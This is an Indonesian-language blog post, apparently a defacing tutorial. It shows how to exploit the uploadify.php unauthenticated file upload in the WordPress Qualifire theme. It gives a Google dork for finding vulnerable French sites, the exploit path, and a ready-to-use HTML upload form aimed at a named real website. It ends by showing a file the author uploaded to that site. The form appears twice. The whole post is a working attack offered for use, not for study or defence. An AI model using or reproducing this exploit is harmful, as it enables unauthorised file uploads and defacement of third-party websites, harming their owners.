kali ini kakafuad mau shareing gimana cara nya pepes dengan metode Qualifire File Upload
pertama-tama kita cari terlebih dahulu targetnya gunain dork ini
inurl:/wp-content/themes/qualifire site:.fr
selanjutnya pilih salah satu ,,
kemudian exploit urlnya dengan ini
/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.phptempatkan tepat dibelakang site.com/ nya
kalo vuln ,, dia akan blank seperti gambar diatas.
sekarang gunakan script berikut untuk upload file kedalam situsnya.
<form
action="http://www.lightsonorisation.fr/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
<!-- by anbuKakashi -->
</form>
action="http://www.lightsonorisation.fr/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
<!-- by anbuKakashi -->
</form>
yang berwana merah ganti dengan site yang kalian temukan. simpan dengan ekstensi .html
kemudian buka file yang sudah dibuat tadi.
sekarang waktunya pertunjukan ,, upload file nya kemudian submit.
jika berhasil maka akan seperti pada tampilan berikut, ada angka 1
sekarang uji coba.. cara memanggilnya dengan site.fr/file
contoh : http://www.lightsonorisation.fr/2016.png
HAPPY NEW YEARS 2016 ( ^_^ )!!!!
0 comments:
Post a Comment